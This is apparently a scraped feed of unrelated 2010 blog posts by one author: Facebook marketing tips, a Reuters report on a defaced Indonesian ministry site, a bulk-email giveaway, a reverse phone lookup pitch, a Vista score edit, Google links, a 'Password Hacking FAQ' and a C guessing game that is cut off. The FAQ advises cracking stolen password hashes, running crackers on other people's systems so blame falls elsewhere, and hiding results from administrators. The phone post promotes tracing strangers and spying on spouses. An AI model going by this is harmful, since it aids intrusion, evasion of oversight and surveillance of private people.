<div style="text-align: center;"><img alt="-Twitter Facebook Application Screenshot-" height="156" src="http://www.allfacebook.com/images/twitter-app.gif" width="520" /> </div><h3>Conclusion</h3>After reading through the top 12 Facebook marketing hacks you may be thinking a few things. First, this is a lot of things to keep track of. If you thought that, you’d be right. Leveraging Facebook for promotional purposes is a pretty challenging task, even for those knowledgeable about implementing some of these hacks effectively. The bottom line is it takes time and it takes consistency.<br />
The second thing you were possibly thing is, “Isn’t this spam?” Well, some of these hacks can most definitely cross the line into spam while others are not as aggressive. I’d imagine that you are smart enough to determine which of these should be done regularly, which should be done occasionally, and which should not be done at all. <br />
<b>Everything in Moderation</b><br />
As such, make sure that you leverage these marketing tactics and others in moderation. Marketing in excess is called spam and spamming on Facebook is something you should avoid. Not only will you piss people off, but you also risk getting banned from the site completely. <br />
<b>Build Your Network BY Email Marketing And Invite !</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQcv7VNf6lSyomf764CHjcB_bZpYO-npiazaIEI8Re0IxAy84aEYbAIeaTxEX2gHIRL2ITWjDjnivdsWGKuw_sbClelwA1xwHb5_7ZxZSf28MwBLvCIV_DFPMVByeKFh1w8W8Ex5N8WEQ/s1600/free+emails.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQcv7VNf6lSyomf764CHjcB_bZpYO-npiazaIEI8Re0IxAy84aEYbAIeaTxEX2gHIRL2ITWjDjnivdsWGKuw_sbClelwA1xwHb5_7ZxZSf28MwBLvCIV_DFPMVByeKFh1w8W8Ex5N8WEQ/s320/free+emails.jpg" /></a></div><span style="font-size: large;"><span style="font-size: x-large;"><b style="font-family: "Trebuchet MS",sans-serif;"><b style="font-weight: normal;"> </b></b><b><span style="font-size: large;"><span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-family: Verdana,sans-serif;">Click Here to get These EMAILS</span></span></span></b></span><b style="font-family: "Trebuchet MS",sans-serif;"> </b><span style="font-size: x-large;"><b><span style="font-family: "Trebuchet MS",sans-serif;">-</span></b></span></span><span style="font-size: large;"><span style="font-size: x-large;"><b><span style="font-size: large;"><span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-family: Verdana,sans-serif;"> <a href="http://www.facebook.com/pages/Free-Emails/150014471681117?ref=search">Free EMAILS</a></span></span></span></b></span></span><br />
One of the best ways to build your promotional abilities is by building your network. If you are one of the nodes in a network, there’s a good chance that your stories will receive a greater priority among your friends. So spend time adding your friends. One quick way to do this is to use the email address import tool found on the <a href="http://www.facebook.com/invite.php?ref=tn">Facebook invite page</a>. <br />
Often times you will instantly find hundreds of people that you’ve never connected with. <br />
<b>Say Hello!</b><br />
It’s easy to rapidly turn into a robot once you start leveraging some of the Facebook marketing hacks outlined in this article. That is exactly when you need to take a break and say hello to new people. Did new people join your Fan page? Say “Hello!” and add them as a friend. Find out more about them. It’s important that you socialize with others rather than just promote. <br />
<b>Define Your Own Goals</b><br />
Some people just want to self promote themselves while others want to promote their business. Whatever you are trying to market, Facebook can help you accomplish your goals as long as you know what they are. If you stay consistent with your Facebook marketing activities, you will soon accomplish your goals. </div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-71401637619595238562010-08-10T08:28:00.000-07:002010-08-10T12:43:57.366-07:00Indonesian ministry Web site hacked over porn ban<div class="relatedPhoto portrait" id="articleImage"><img alt="A screen grab of www.depkominfo.go.id. REUTERS/www.depkominfo.go.id" border="0" src="http://uk.reuters.com/resources/r/?m=02&d=20080328&t=2&i=3678249&w=320&fh=&fw=&ll=&pl=&r=2008-03-28T102002Z_01_JAK242571_RTRUKOP_0_PICTURE0" /> <br />
<div class="rolloverCaption" id="captionContent"><div class="rolloverBg"><div class="captionText"><br />
</div></div></div></div><span id="trackingEnabledModule" moduleid="12624908" modulename="Related News" name="trackingEnabledModule"> <script language="javascript">
addImpression("12624908_Related News");
</script> <script type="text/javascript">
removeImpression();
</script> </span> <span id="trackingEnabledModule" moduleid="12624909" modulename="Related News (Loomia)" name="trackingEnabledModule"> <script language="javascript">
addImpression("12624909_Related News (Loomia)");
</script> </span><br />
<div class="columnRight"><div class="relatedRail gridPanel grid2"><script language="javascript" src="http://uk.reuters.com/resources_v2/js/widget-related.js">
</script></div></div><span id="trackingEnabledModule" moduleid="12624909" modulename="Related News (Loomia)" name="trackingEnabledModule"></span> <br />
<div class="columnRight"><div class="relatedRail gridPanel grid2"><div class="module" id="relatedTopics"><br />
</div></div></div><div class="columnRight"><div class="relatedRail gridPanel grid2"></div></div><script type="text/javascript">
Reuters.utils.addLoadEvent(function() { Reuters.utils.loadScript('sJSON','/assets/multimediaJSON?articleId=UKJAK24257120080328&setImage=300&view=100&startNumber=1') });
</script> <script type="text/javascript">
</script> <span id="articleText"> <span id="midArticle_start"></span> </span><br />
<div id="articleInfo"><span id="articleText"><span class="location"></span><span class="timestamp"><br />
</span> </span></div><span id="articleText"><span style="font-family: "Trebuchet MS",sans-serif; font-size: x-large;"><span class="focusParagraph"><span class="articleLocation">JAKARTA</span> (Reuters) - Hackers have defaced the Web site of Indonesia's information ministry in response to a government move to restrict access to pornographic material on the Internet, an official said on Friday.<br />
</span></span><span id="midArticle_0"></span>Indonesia's parliament on Tuesday passed a new information bill that criminalises the transmission of pornographic material on the Web.<br />
<span id="midArticle_1"></span>The Southeast Asian country has had a vigorous debate over pornography in recent years, exposing deep divisions in the Muslim-majority nation.<br />
<span id="midArticle_2"></span>Hackers on Thursday posted a message on the information ministry's Web site (<a href="http://www.depkominfo.go.id/">www.depkominfo.go.id</a>) saying: "Prove that the law has not been made to cover government stupidity."<br />
<span id="midArticle_3"></span>The message was accompanied by a mocked-up photograph of a local information technology expert, who has been advising the government on the new law, depicted with a bare chest.<br />
<span id="midArticle_4"></span>Screenshots of the hacked page were posted on the Detik.com news Web site and a cyber chat forum.<br />
<span id="midArticle_5"></span>The message had been removed and the Web site was now running normally, said Gatot Broto, an official at the ministry.<br />
<span id="midArticle_6"></span>The ministry said the law was a response to concerns in society about the negative impact of pornographic and violent sites as more Indonesians gain access to the Internet.<br />
<span id="midArticle_7"></span>Under the law, anyone found guilty of transmitting pornographic material, false news or racial and religious hate messages on the Internet could face up to six years in prison or a fine of 1 billion rupiah (54,500 pounds).<br />
<span id="midArticle_8"></span>Indonesia's parliament has yet to pass a controversial pornography bill, which aims to shield the young from pornographic material and lewd acts.<br />
<span id="midArticle_0"></span>Earlier draft versions contained provisions that could jail people for kissing in public and criminalise many forms of art or traditional culture that hinge on sensuality, sparking criticism it could curb freedoms and hurt Indonesia's tolerant tradition.</span>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-87948527228350868392010-08-08T06:11:00.000-07:002010-08-08T06:11:54.168-07:00Want Free Emails For Email marketing or Social Media<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td align="left" class="pakistan" colspan="2" height="30" style="padding-left: 10px;" valign="middle"></td> </tr>
<tr> <td colspan="2"><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr> <td align="left" valign="top" width="116"><img height="108" src="http://www.websolpro.com/services/marketing/internet-marketing/bulk-email-karachi-pakistan.jpg" width="116" /></td> <td valign="top" width="537"><strong>E-mail Marketing</strong> is a form of direct marketing which uses electronic mail as a medium of communicating commercial messages to an audience. Broadly speaking, every e-mail sent to a likely or existing customer could be considered as part of e-mail marketing. <strong>Email Advertising</strong> is implemented with an objective of sending e-mails with the intention of acquiring new customers or persuading current customers to buy something instantaneously</td> </tr>
</tbody></table></td> </tr>
<tr> <td colspan="2"><strong>Bulk email marketing</strong> has slowly become the most popular method of online marketing second to search engine marketing. Businesses large and small can use <strong>bulk email marketing</strong> to generate leads and traffic, making the Internet a level playing field. Studies have shown that the average bulk email campaign yields a one- to two-percent response. That may not sound like much, but one-percent of one-million recipients' equal 10,000 new customers! How would that help your bottom line?<br />
<br />
<br />
<br />
<strong>Benefits of Email Marketing Service </strong><br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> E-Mail Advertising is less expensive than other media investments like direct mail or printed newsletters. <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> With bulk <strong>email marketing</strong>, an exact return on investment <strong>(ROI)</strong> can be tracked and when done properly, it has proven to be fairly high. <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> The delivery time for an e-mail message is short (i.e., seconds or minutes) as compared to a mailed advertisement (i.e., one or more days). <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Advertisers can reach considerable number of e-mail subscribers who have chose to receive e-mail communications on subjects of interest to them. <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Newsletter Campaigns helps customer to remain updated about the latest products, services or events of the company. <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> It is surely a good way of marketing online publications, making it quite easy for regular readers. <br />
<br />
<br />
<strong>Newsletter Marketing Service</strong><br />
<strong>Newsletter Marketing</strong> helps in keeping customers well-informed about the latest development in your business. Newsletters containing information about the business updates are sent to readers who have subscribed to newsletters, so that they can know more about your products or services. <br />
<br />
<strong>Benefits of Newsletter Marketing Service </strong><br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Chance to develop good rapport with customer <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Get readers’ attention. <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Increases Customer Loyalty and Revenues <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Increases Credibility <br />
<img alt="" height="9" src="http://www.websolpro.com/services/marketing/internet-marketing/images/image_59.jpg" width="5" /> Increases viral marketing opportunities <br />
<div align="center"><img height="371" src="http://www.websolpro.com/services/marketing/internet-marketing/email-marketing-equals-product-selling.png" width="485" /></div><br />
Our <strong>Email and Newsletter marketing tools</strong> maximize email marketing campaigns’ Return on Investment by assuring that right email is sent to the right person at the right time. Usage of these tools results in more revenues, higher customer engagement levels, decreased program costs, and lower email opt-out rates. <br />
No matter whether you run a small business, a non-profit organization, or multinational company with number of employers in thousands, Web Solution Provider sophisticated, affordable and user-friendly tools can give a boost to your bulk email marketing to a much higher level. Our fully Web-based service empowers you like no other marketing tool can. So, promote your business and boost sales, by building mail list and bonding with your customers. It is one of the best ways of advertising to remain in contact with customers and build a healthy relationship with them.<br />
<div align="center"></div><div align="center"><img height="421" src="http://www.websolpro.com/services/marketing/internet-marketing/bulk-email-marketing-karachi-pakistan.jpg" width="520" /> </div><div align="center"><br />
</div><div style="text-align: left;">Click Here To Get Free Emails </div><div style="text-align: left;"><br />
</div><div style="text-align: left;"><a href="http://www.facebook.com/pages/Free-Emails/150014471681117">http://www.facebook.com/pages/Free-Emails/150014471681117 </a></div><div style="color: red; text-align: left;"><b><br />
</b></div><div style="color: black; font-family: "Trebuchet MS",sans-serif; text-align: left;"><span style="font-size: small;"><b>Like This Page to get free emails for marketing</b> <span style="font-family: "Courier New",Courier,monospace;">And You Can Also Suggest This page If You Really like It !</span></span></div><div style="text-align: left;"><span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: black;"></span></span></div><div style="text-align: left;"><br />
</div><div style="text-align: left;"><br />
</div></td></tr>
</tbody></table>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-60740440885082360212010-08-08T05:56:00.001-07:002010-08-08T10:56:19.385-07:00Cell Phone Lookup – How to Do a Reverse Cell Phone Lookup<div class="separator" style="clear: both; text-align: center;"><a href="http://www.phonenumberscan.com/logo-300.GIF" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="170" src="http://www.phonenumberscan.com/logo-300.GIF" width="320" /></a></div>A <b>Reverse Cell Phone Lookup </b>is simply a process of finding someone’s personal details such as name, age, address and related information by using their cell phone number. At times it becomes necessary for us to start investigating on someone to know their personal details. The reason for this can be many – Some people may go for a cell phone lookup in order to locate their old friends, some to investigate the prank calls or to trace a suspicious number. <br />
There exists a lot of websites on the Internet that offer reverse cell phone search, some claim to be free while others ask you a small fee for the subscription. There also exists a few directories that provide access to both landline and cell phone numbers thereby providing an all-in-one lookup service.<br />
Since most people wish to access this information for free, they go in search of those websites which provide the reverse cell phone lookup service for free. Most scam websites take up this tendency of people as an added advantage and try to attract more and more visitors by promising them to provide the search service at a free of cost. In reality, the visitors of these websites may pick up malware programs like viruses and trojans. So you should be very careful not to visit any of such websites unless you are 100% confident about their legitimacy.Hence in order to do a reverse cell phone lookup, you need to find a trusted website/directory service that provide information which is accurate and authentic.<br />
Even though there is no national cell phone lookup directory available in United States due to various privacy concerns, there are still a number of top quality directories used by various private detectives, journalists and those why are in need to spy on their cheating spouse or children. These companies invest a lot of time and financial resources in gathering mobile phone and landline numbers by using both private and public sources, as well as major cell phone carrier restricted databases.<br />
Thus by using this service it becomes just a cakewalk for anyone to find the details associated with any phone number whether it be a cell phone or a landline. The entire process of finding someone by cellphone number is very straightforward – all you need to do is just enter the phone number that you want to trace down and hit the “Search” button. You will be able to instantly view the information such as the phone owner’s name, age, mobile provider, billing address, previous addresses and more.<br />
I recommend the following cell phone directory to search both mobile & landline and listed/unlisted residential numbers. The site is completely safe and uses a 128-bit secured access to maintain 100% privacy of the uses. All searches remains private and anonymous. Click on the following link to gain access now!Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com2tag:blogger.com,1999:blog-5938474543606888364.post-45862967896422724242010-08-05T22:07:00.001-07:002010-08-05T22:07:20.445-07:00Hack/Alter Windows Vista Base ScoreIf you are a Windows Vista user then you are very likely to be familiar with the <strong>Base Score</strong>. This score is calculated based on the computer’s hardware and software configuration. This score act’s as a rating to your PC. If you have a too low base score then don’t worry. Hacking Windows Vista’s so called <strong>Base Score</strong> is very easy. It is possible to hack this score within no time.Here are the snapshots of my own system. Actually my system’s base score is <strong>3.7</strong>. But I have brought it up to <strong>9.5 </strong>with this small hack. Can you beleive this!!<br />
<div style="text-align: center;"><img alt="" class="size-full wp-image-217 aligncenter" height="206" src="http://www.gohacking.com/wp-content/uploads/2008/12/system_info.jpg" title="system_info" width="400" /></div><div style="text-align: center;"><img alt="" class="aligncenter size-full wp-image-218" height="274" src="http://www.gohacking.com/wp-content/uploads/2008/12/hacking_vista_base_score.jpg" title="hacking_vista_base_score" width="400" /></div>Here is a step-by-step instruction to hack Vista Base score<br />
1. Navigate to <br />
<div class="stb-info_box"><strong>C:\Windows\Performance\WinSAT\DataStore </strong></div>2. You should see a <strong>.xml</strong> file with <strong>Assessment (Formal).WinSAT</strong> as filename<br />
3. Right-click it and select open with ‘Wordpad’ (Not notepad!)<br />
4. On line 12, you should see something like the following:<br />
<div class="stb-info_box"><systemscore><strong>9.5</strong></systemscore><br />
<memoryscore><strong>9.5</strong></memoryscore><br />
<cpuscore><strong>9.5</strong></cpuscore><br />
<cpusubaggscore><strong>9.5</strong></cpusubaggscore><br />
<videoencodescore><strong>5.5</strong></videoencodescore><br />
<graphicsscore><strong>9.5</strong></graphicsscore><br />
<gamingscore><strong>9.5</strong></gamingscore><br />
<diskscore><strong>9.5</strong></diskscore></div>5. You can enter any number in the place where I have written <strong>9.5</strong>. But the number should be less than <strong>10</strong>.<br />
6. Once you have entered the number of your choice save the file and close it.<br />
7. That’s it. You have successfully altered your Windows Vista base score. No restart is required.Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-24711975432218443412010-08-05T22:06:00.002-07:002010-08-05T22:06:57.018-07:00Inside GOOGLE – A Collection of Strange Links on Google<div style="text-align: center;"><img alt="" class="aligncenter" height="133" src="http://www.gohacking.com/wp-content/uploads/2008/12/googlepickle.jpg" title="Inside Google" width="320" /></div>Although Google is a search engine, it’s also a website. It has millions of it’s own pages indexed in it. When i was digging deep inside Google i found some strange links inside it. So I decided to compile a list of strange Google links. Enjoy!<br />
1. If you ever wondered all the misspellings of Britney Spears and their volume, you must check this out.<br />
<a href="http://www.google.com/jobs/britney.html" target="_blank">http://www.google.com/jobs/britney.html</a><br />
2. These two links are to fun Google games<br />
<a href="http://www.google.com/Easter/feature_easter.html" target="_blank">http://www.google.com/Easter/feature_easter.html</a><br />
<a href="http://www.google.com/heart/heart01.html" target="_blank">http://www.google.com/heart/heart01.html</a><br />
3. Quench your thirst for knowledge with Google Gulp<br />
<a href="http://www.google.com/googlegulp/" target="_blank">www.google.com/googlegulp</a><br />
4. Check out Google’s latest ideas<br />
<a href="http://www.google.com/experimental/" target="_blank">http://www.google.com/experimental</a><br />
5. If you are fond of puzzles<br />
<a href="http://www.google.com/puzzles/" target="_blank">http://www.google.com/puzzles</a><br />
6. Tribute to Moms<br />
<a href="http://www.google.com/moms01/" target="_blank">http://www.google.com/moms01</a><br />
7. Google Mobile maps<br />
<a href="http://www.google.com/mobile/gmm/index.html" target="_blank">http://www.google.com/mobile/gmm/index.html</a><br />
8. <a href="http://www.google.com/tofc/" target="_blank">http://www.google.com/tofc</a><br />
9. Are you scary smart?<br />
<a href="http://www.google.com/scarysmart/" target="_blank">http://www.google.com/scarysmart</a><br />
10. Google press center<br />
<a href="http://www.google.com/press/" target="_blank">http://www.google.com/press</a><br />
11. Google apps<br />
<a href="http://www.google.com/a" target="_blank">http://www.google.com/a/help/intl/en/var_0.html</a><br />
12. Mind-racing problems<br />
<a href="http://www.google.com/indiacodejam/" target="_blank">http://www.google.com/indiacodejam</a><br />
13. Doodle 4 Google<br />
<a href="http://www.google.com/doodle4google/" target="_blank">http://www.google.com/doodle4google</a><br />
14. The virgle<br />
<a href="http://www.google.com/virgle/" target="_blank">http://www.google.com/virgle</a><br />
15. Google Alerts<br />
<a href="http://www.google.com/alerts" target="_blank">http://www.google.com/alerts</a><br />
16. Urchin Software from Google<br />
<a href="http://www.google.com/urchin/" target="_blank">http://www.google.com/urchin</a><br />
17. Google dictionary<br />
<a href="http://www.google.com/translate_dict" target="_blank">http://www.google.com/translate_dict</a><br />
18. Inside google<br />
<a href="http://www.google.com/plex/" target="_blank">http://www.google.com/plex</a><br />
19. Movie reviews<br />
<a href="http://www.google.com/reviews" target="_blank">http://www.google.com/reviews</a><br />
20. Google Mars<br />
<a href="http://www.google.com/mars/" target="_blank">htttp://www.google.com/mars</a><br />
21. Google Sky<br />
<a href="http://www.google.com/sky/" target="_blank">http://www.google.com/sky</a><br />
22. Google’s next Coding Competition site<br />
<a href="http://www.google.com/codejam/" target="_blank">http://www.google.com/codejam</a><br />
23.<a href="http://www.google.com/pda" target="_blank">http://www.google.com/pda</a><br />
24.<a href="http://www.google.com/m" target="_blank">http://www.google.com/m</a><br />
25.<a href="http://www.google.com/imode/" target="_blank">http://www.google.com/imode</a><br />
26.<a href="http://www.google.com/jsky" target="_blank">http://www.google.com/jsky</a><br />
27. Blog search<br />
<a href="http://www.google.com/blogsearch" target="_blank">http://www.google.com/blogsearch</a><br />
28.Microsoft on google<br />
<a href="http://www.google.com/microsoft" target="_blank">http://www.google.com/microsoft</a><br />
29. Google Moon<br />
<a href="http://www.google.com/moon/" target="_blank">http://www.google.com/moon</a><br />
30. Google Linux<br />
<a href="http://www.google.com/linux" target="_blank">http://www.google.com/linux</a><br />
31. <a href="http://www.google.com/ie" target="_blank">http://www.google.com/ie</a><br />
32. Google tour<br />
<a href="http://www.google.com/tour/services/" target="_blank">http://www.google.com/tour/services</a><br />
33. Google TOS<br />
<a href="http://www.google.com/accounts/TOS" target="_blank">http://www.google.com/accounts/TOS</a><br />
34. Google trends<br />
<a href="http://www.google.com/trends/hottrends" target="_blank">http://www.google.com/trends/hottrends</a><br />
35. Google arts<br />
<a href="http://www.google.com/Top/Arts/" target="_blank">http://www.google.com/Top/Arts</a><br />
36. Google 3d warehouse<br />
<a href="http://www.google.com/sketchup/3dwh/" target="_blank">http://www.google.com/sketchup/3dwh</a><br />
37. Google Adult content<br />
<a href="http://www.google.com/Top/Adult/" target="_blank">http://www.google.com/Top/Adult</a><br />
38. Google & Dilbert Doodle<br />
<a href="http://www.google.com/dilbert.html" target="_blank">http://www.google.com/dilbert.html</a><br />
39. Google in Kannada<br />
<a href="http://www.google.com/intl/kn/" target="_blank">www.google.com/intl/kn</a><br />
40. Google strange logos<br />
<a href="http://www.google.com/doodle8.html" target="_blank">http://www.google.com/doodle8.html</a><br />
<a href="http://www.google.com/doodle9.html" target="_blank">http://www.google.com/doodle9.html</a><br />
30.Win Registry files in google<br />
http://www.google.com/google_rsearch.reg<br />
31.Google Universities Search<br />
<a href="http://www.google.com/options/universities.html" target="_blank">http://www.google.com/options/universities.html</a><br />
Oops there’s still lot more.But only this much for now….Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-84230189437252304972010-08-05T22:06:00.000-07:002010-08-05T22:06:21.049-07:00Password Hacking FAQ<div class="separator" style="clear: both; text-align: center;"><a href="http://www.gohacking.com/wp-content/uploads/2008/12/hacking-passwords-300x224.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.gohacking.com/wp-content/uploads/2008/12/hacking-passwords-300x224.jpg" /></a></div><h3>1. What are some password basics?</h3><div> </div>Most accounts on a computer system usually have some method of restricting access to that account, usually in the form of a password. When accessing the system, the user has to present a valid ID to use the system, followed by a password to use the account. Most systems either do not echo the password back on the screen as it is typed, or they print an asterisk in place of the real character.<br />
On most systems,the password is typically ran through some type of algorithm to generate a hash. The hash is usually more than just a scrambled version of the original text that made up the password, it is usually a one-way hash. The one-way hash is a string of characters that cannot be reversed into its original text. You see, most systems do not “decrypt” the stored password during authentication, they store the one-way hash. During the login process, you supply an account and password. The password is ran through an algorithm that generates a one-way hash. This hash is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied.<br />
Cryptographically speaking, some algorithms are better than others at generating a one-way hash. The main operating systems we are covering here — NT, Netware, and Unix — all use an algorithm that has been made publically available and has been scrutinized to some degree.<br />
To crack a password requires getting a copy of the one-way hash stored on the server, and then using the algorithm generate your own hash until you get a match. When you get a match, whatever word you used to generate your hash will allow you to log into that system. Since this can be rather time-consuming, automation is typically used. There are freeware password crackers available for NT, Netware, and Unix.<br />
<div> </div><h3>2. Why protect the hashes?</h3><div> </div>If the one-way hashes are not the password itself but a mathematical derivative, why should they be protected? Well, since the algorithm is already known, a password cracker could be used to simply encrypt the possible passwords and compare the one-way hashes until you get a match. There are two types of approaches to this — dictionary and brute force.<br />
Usually the hashes are stored in a part of the system that has extra security to limit access from potential crackers.<br />
<div> </div><h3>3. What is a dictionary password cracker?</h3><div> </div>A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password.<br />
Some of these dictionary crackers can “manipulate” each word in the wordlist by using filters. These rules/filters allow you to change “idiot” to “1d10t” and other advanced variations to get the most from a word list. The best known of these mutation filters are the rules that come with Crack (for Unix). These filtering rules are so popular they have been ported over to cracking software for NT.<br />
If your dictionary cracker does not have manipulation rules, you can “pre-treat” the wordlist. There are plenty of wordlist manipulation tools that allow all kinds of ways to filter, expand, and alter wordlists. With a little careful planning, you can turn a small collection of wordlists into a very large and thorough list for dictionary crackers without those fancy word manipulations built in.<br />
<div> </div><h3>4. What is a brute force password cracker?</h3><div> </div>A brute force cracker simply tries all possible passwords until it gets the password. From a cracker perspective, this is usually very time consuming. However, given enough time and CPU power, the password eventually gets cracked.<br />
Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.<br />
<div> </div><h3>5. Which method is best for cracking?</h3><div> </div>It really depends on your goal, the cracking software you have, and the operating system you are trying to crack. Let’s go through several scenarios.<br />
If you remotely retrieved the password file through some system bug, your goal may be to simply get logged into that system. With the password file, you now have the user accounts and the hashes. A dictionary attack seems like the quickest method, as you may simply want access to the box. This is typical if you have a method of leveraging basic access to gain god status.<br />
If you already have basic access and used this access to get the password file, maybe you have a particular account you wish to crack. While a couple of swipes with a dictionary cracker might help, brute force may be the way to go.<br />
If your cracking software does both dictionary and brute force, and both are quite slow, you may just wish to kick off a brute force attack and then go about your day. By all means, we recommend a dictionary attack with a pre-treated wordlist first, followed up by brute force only on the accounts you really want the password to.<br />
You should pre-treat your wordlists if the machine you are going to be cracking from bottlenecks more at the CPU than at the disk controller. For example, some slower computers with extremely fast drives make good candidates for large pre-treated wordlists, but if you have the CPU cycles to spare you might want to let the cracking program’s manipulation filters do their thing.<br />
A lot of serious hackers have a large wordlist in both regular and pre-treated form to accommodate either need.<br />
<div> </div><h3>6. What is a salt?</h3><div> </div>To increase the overhead in cracking passwords, some algorithms employ salts to add further complexity and difficulty to the cracking of passwords. These salts are typically 2 to 8 bytes in length, and algorithmically introduced to further obfuscate the one-way hash. Of the major operating systems covered here, only NT does not use a salt. The specifics for salts for both Unix and Netware systems are covered in their individual password sections.<br />
Historically, the way cracking has been done is to take a potential password, encrypt it and produce the hash, and then compare the result to each account in the password file. By adding a salt, you force the cracker to have to read the salt in and encrypt the potential password with each salt present in the password file. This increases the amount of time to break all of the passwords, although it is certainly no guarantee that the passwords can’t be cracked. Because of this most modern password crackers when dealing with salts do give the option of checking a specific account.<br />
<div> </div><h3>7. What are the dangers of cracking passwords?</h3><div> </div>The dangers are quite simple, and quite real. If you are caught with a password file you do not have legitimate access to, you are technically in possession of stolen property in the eyes of the law. For this reason, some hackers like to run the cracking on someone else’s systems, thereby limiting their liability. I would only recommend doing this on a system you have a legitimate or well-established account on if you wish to keep a good eye on things, but perhaps have a way of running the cracking software under a different account than your own. This way, if the cracking is discovered (as it often is — cracking is fairly CPU-intensive), it looks to belong to someone else. Obviously, you would want to run this under system adminstrator priviledges as you may have a bit more control, such as assigning lower priority to the cracking software, and hiding the results (making it less obvious to the real administrator).<br />
Being on a system you have legit access to also allows you better access to check on the progress. Of course, if it is known you are a hacker, you’ll still be the first to be blamed whether the cracking software is yours or not!<br />
Running the cracking software in the privacy of your own home has the advantage of allowing you to throw any and all computing power you have at your disposal at a password, but if caught (say you get raided) then there is little doubt whose cracking job is running. However, there are a couple of things you can do to protect yourself: encrypt your files. Only decrypt them when you are viewing them, and wipe and/or encrypt them back after you are done viewing them.<br />
<div> </div><h3>8. Is there any way I can open a password-protected Microsoft Office document?</h3><div> </div>Certainly! There are plenty of commercial programs that will do this, but we give props to <a href="http://www.elcomsoft.com/" rel="nofollow" target="_blank">Elcomsoft</a>. 30-day trial versions are available <a href="http://www.crackpassword.com/download/" rel="nofollow" target="_blank">here</a>.Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-72386738626066742242010-08-05T22:05:00.001-07:002010-08-05T22:05:28.738-07:00Guessing Game In C<div class="separator" style="clear: both; text-align: center;"><a href="http://www.gohacking.com/wp-content/uploads/2008/12/c.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.gohacking.com/wp-content/uploads/2008/12/c.jpg" /></a></div>This is a small guessing game written in C. In this guessing game you have to guess a number between 0 & 100. You have 8 chances to do that. Every time you guess wrongly the program will give you a hint that your guess is too high or your guess is too low. Based on this hint you have to guess the number in the remaining attempts. Here’s the code<br />
<br />
<div class="stb-info_box">#include<stdio.h><br />
#include<stdlib.h><br />
#include<time.h> void main()<br />
{<br />
int num,guess=-1,tries=0,pass=0;<br />
time_t t;<br />
srand((unsigned)time(&t));<br />
num=rand()%100;<br />
while((guess!=num)&&tries<8)<br />
{<br />
printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)\n”,(8-tries)); scanf(“%d”,&guess);<br />
tries++;<br />
if(guess==num)<br />
{<br />
printf(“Hurray you guessed it correctly!!!\n”);<br />
pass=1;<br />
}<br />
else if(num< guess)<br />
printf(“Your guess is too high\n”);<br />
else<br />
printf(“Your guess is too low\n”);<br />
}<br />
if(pass==0)<br />
printf(“Sorry you lost! The correct number is %d\n”,num);<br />
